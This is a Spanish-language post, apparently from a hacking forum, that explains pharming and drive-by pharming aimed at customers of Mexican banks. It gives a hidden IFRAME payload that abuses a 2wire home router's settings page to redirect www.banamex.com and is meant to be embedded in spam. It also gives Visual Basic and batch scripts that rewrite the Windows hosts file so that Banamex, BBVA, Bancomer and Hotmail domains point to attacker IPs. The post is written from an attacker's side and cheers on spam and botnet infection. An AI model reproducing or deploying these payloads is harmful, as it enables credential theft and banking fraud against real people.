Pharming y Drive By Pharming son actualmente las tecnicas usadas:
El drive by pharming consiste en la modificación de los registros para resolución de nombres (DNS) y busca redirigir las peticiones de conexión de un usuario hacia un sistema comprometido por un atacante. Una modalidad consiste en modificar el archivo “hosts” de los equipos de las víctimas, pero una variante más difícil de detectar consiste en alterar los registros de resolución de nombres de los ruteadores caseros de banda ancha (DSL). Este ataque realizado usualmente con tecnologías como javascript y flash intenta identificar la marca y dirección del ruteador casero para poder comprometerlo exitosamente.
Ejemplo del nuevo drive:
QUOTE
<IFRAME frameborder="0" name="frm1" scrolling='Auto'
src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=127.0.0.0" tppabs="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=127.0.0.0" height="1" width="1" ></IFRAME>
Este codigo va insertado en la letter (la carta o mensaje que se envia en spam)
El pharming consiste en ejecutar un .exe o un .bat de apariencia inocente que modifica los host como se muestra aqui:
SOURCE VISUAL BASIC
QUOTE
Sub hosts()
ip = "72.167.163.147" '
host1 = " 72.167.163.147 www.banamex.com"
host2 = " 72.167.163.147 www.banamex.com.mx"
host3 = " 72.167.163.147 banamex.com"
host4 = " 72.167.163.147 banamex.com.mx"
host5 = " 72.167.163.147 boveda.banamex.com"
host6 = " 72.167.163.147 boveda.banamex.com.mx"
host7 = " 72.167.163.147 www.boveda.banamex.com"
host8 = " 72.167.163.147 www.boveda.banamex.com.mx"
host9 = " 72.167.163.147 bancanetempresarial.banamex.com"
host10 = " 72.167.163.147 bancanetempresarial.banamex.com.mx"
host11 = " 72.167.163.147 www.bancanetempresarial.banamex.com"
host12 = " 72.167.163.147 www.bacanetempresarial.banamex.com.mx"
Open "C:\WINDOWS\system32\drivers\etc\hosts" For Output As #1
Print #1, ip; host1
Print #1, ip; host2
Print #1, ip; host3
Print #1, ip; host4
Print #1, ip; host5
Print #1, ip; host6
Print #1, ip; host7
Print #1, ip; host8
Print #1, ip; host9
Print #1, ip; host10
Print #1, ip; host11
Print #1, ip; host12
Close #1
End Sub
SOURCE BATCH
QUOTE
@echo off
echo 195.69.75.149 www.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 195.69.75.149 www.bbva.com >> %windir%\system32\drivers\etc\hosts
echo 195.69.75.149 www.bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
echo 195.69.75.149 www.esmas.com >> %windir%\system32\drivers\etc\hosts
echo 195.69.75.149 www.hotmail.com >> %windir%\system32\drivers\etc\hosts
exit
Actualmente los que utilizan estas tecnicas necesitan de un dedicado o una ip dedicada pora porder hacer pharming...
CABE MENCIONAR QUE EL SPAM SE LLEVA DE LA MANO CON BOTS Y DRONES PARA UNA INFECCION SATISFACTORIA =)